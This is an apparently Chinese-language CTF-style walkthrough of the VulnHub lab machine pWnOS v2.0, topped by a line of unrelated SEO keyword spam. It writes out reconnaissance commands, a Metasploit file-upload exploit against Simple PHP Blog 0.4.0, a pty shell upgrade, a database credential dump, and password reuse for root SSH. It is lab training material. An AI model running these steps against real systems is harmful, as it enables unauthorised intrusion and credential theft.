人社门户网站建设方案,非官方网站建设,怎么做网站的外链,石家庄开发区网站建设知识点总结#xff1a;
1.通过模块来寻找漏洞
2.msf查找漏洞
3.通过网站源代码#xff0c;查看模块信息
环境准备
攻击机#xff1a;kali2023
靶机#xff1a;pWnOS v2.0
安装地址#xff1a;pWnOS: 2.0 (Pre-Release) ~ VulnHub
在安装网址中看到#xff0c;该靶… 知识点总结
1.通过模块来寻找漏洞
2.msf查找漏洞
3.通过网站源代码查看模块信息
环境准备
攻击机kali2023
靶机pWnOS v2.0
安装地址pWnOS: 2.0 (Pre-Release) ~ VulnHub
在安装网址中看到该靶机静态IP为10.10.10.100
所以我们就要修改虚拟机的虚拟网络编辑器 其次靶机的虚拟机设置如下 开始渗透
信息收集
收集IP(虽然已经知道了)
arp-scan -l 端口扫描
先大概看一下
nmap 10.10.10.100
再详细看一下
nmap -A -p- 10.10.10.100看到内核版本等
访问一下80端口 扫一下目录
gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt扫到了/blog目录访问 查看源代码 查看到建立博客的模块模版是Simple PHP Blog 0.4.0
漏洞查找
msf查找有没有现成的漏洞
search Simple PHP Blog 0.4.0 存在那我们直接利用
use unix/webapp/sphpblog_file_upload
set Rhost 10.10.10.100
set uri /blog //填有该模块的url此处写为uri
run //运行
shell //开启命令行
python -c import pty;pty.spawn(/bin/bash) //优化命令行 提权
查看一下目录 存在文件mysqli_connect.php看看 拿到数据库root密码登录 看看能不能拿到相关账户密码分别执行下述命令爆库
show databases;
use mysql;
show tables;
select * from user;最后看到 看到root的好多密码都是一致的具体解密我也不知道所以没有解密成功
但是我们可以用上面的那个密码再登录一下ssh试试
ssh root10.10.10.100 成功root